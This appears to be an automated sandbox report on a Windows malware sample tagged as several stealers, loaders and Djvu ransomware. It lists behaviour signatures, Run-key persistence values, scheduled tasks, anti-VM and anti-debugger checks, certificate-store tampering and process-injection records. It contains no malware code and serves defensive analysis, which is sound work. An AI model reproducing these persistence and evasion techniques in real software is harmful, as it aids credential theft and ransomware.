Malware Analysis Report

2025-01-02 11:07

Sample ID 240315-bfn63acg6y
Target 66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029
SHA256 66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029
Tags
amadey dcrat djvu smokeloader vidar 82df9629d6ef6fc7fe54d6eb2bc6137b pub1 backdoor discovery evasion infostealer persistence ransomware rat spyware stealer trojan lumma stealc zgrat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029

Threat Level: Known bad

The file 66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029 was found to be: Known bad.

Malicious Activity Summary

amadey dcrat djvu smokeloader vidar 82df9629d6ef6fc7fe54d6eb2bc6137b pub1 backdoor discovery evasion infostealer persistence ransomware rat spyware stealer trojan lumma stealc zgrat

Suspicious use of NtCreateUserProcessOtherParentProcess

Amadey

Stealc

Djvu Ransomware

SmokeLoader

Detect Vidar Stealer

Lumma Stealer

ZGRat

Vidar

DcRat

Detected Djvu ransomware

Detect ZGRat V1

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Downloads MZ/PE file

Reads user/profile data of web browsers

Modifies file permissions

Deletes itself

Checks BIOS information in registry

Loads dropped DLL

Reads data files stored by FTP clients

Identifies Wine through registry keys

Drops startup file

Reads WinSCP keys stored on the system

Executes dropped EXE

Reads local data of messenger clients

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Checks installed software on the system

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

Suspicious use of SendNotifyMessage

Modifies registry class

Enumerates processes with tasklist

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Modifies system certificate store

Uses Task Scheduler COM API

Checks processor information in registry

Creates scheduled task(s)

Runs ping.exe

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-15 01:05

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-15 01:05

Reported

2024-03-15 01:10

Platform

win7-20240221-en

Max time kernel

299s

Max time network

300s

Command Line

"C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ba5a0f87-fa9b-4d62-a767-f7bd38b1c9cc\\7DA9.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8410.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BE25.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31C0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3BCF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\cfdfjwb N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31C0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31C0.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ba5a0f87-fa9b-4d62-a767-f7bd38b1c9cc\\7DA9.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\blyat.dll = "rundll32 C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005011\\blyat.dll, Main" C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\explorgu.job C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A
File created C:\Windows\Tasks\Dctooux.job C:\Users\Admin\AppData\Local\Temp\31C0.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cfdfjwb N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cfdfjwb N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cfdfjwb N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\cfdfjwb N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31C0.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1200 wrote to memory of 2660 N/A N/A C:\Windows\system32\cmd.exe
PID 1200 wrote to memory of 2660 N/A N/A C:\Windows\system32\cmd.exe
PID 1200 wrote to memory of 2660 N/A N/A C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2660 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2660 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1200 wrote to memory of 2564 N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 1200 wrote to memory of 2564 N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 1200 wrote to memory of 2564 N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 1200 wrote to memory of 2564 N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2564 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2564 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2564 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2564 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2564 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2564 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2564 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2564 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2564 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2564 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2564 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2748 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Windows\SysWOW64\icacls.exe
PID 2748 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Windows\SysWOW64\icacls.exe
PID 2748 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Windows\SysWOW64\icacls.exe
PID 2748 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Windows\SysWOW64\icacls.exe
PID 2748 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2748 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2748 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2748 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2684 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2684 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2684 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2684 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2684 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2684 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2684 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2684 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2684 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2684 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2684 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2204 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 2204 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 2204 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 2204 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 2544 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 2544 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 2544 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 2544 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 2544 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 2544 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
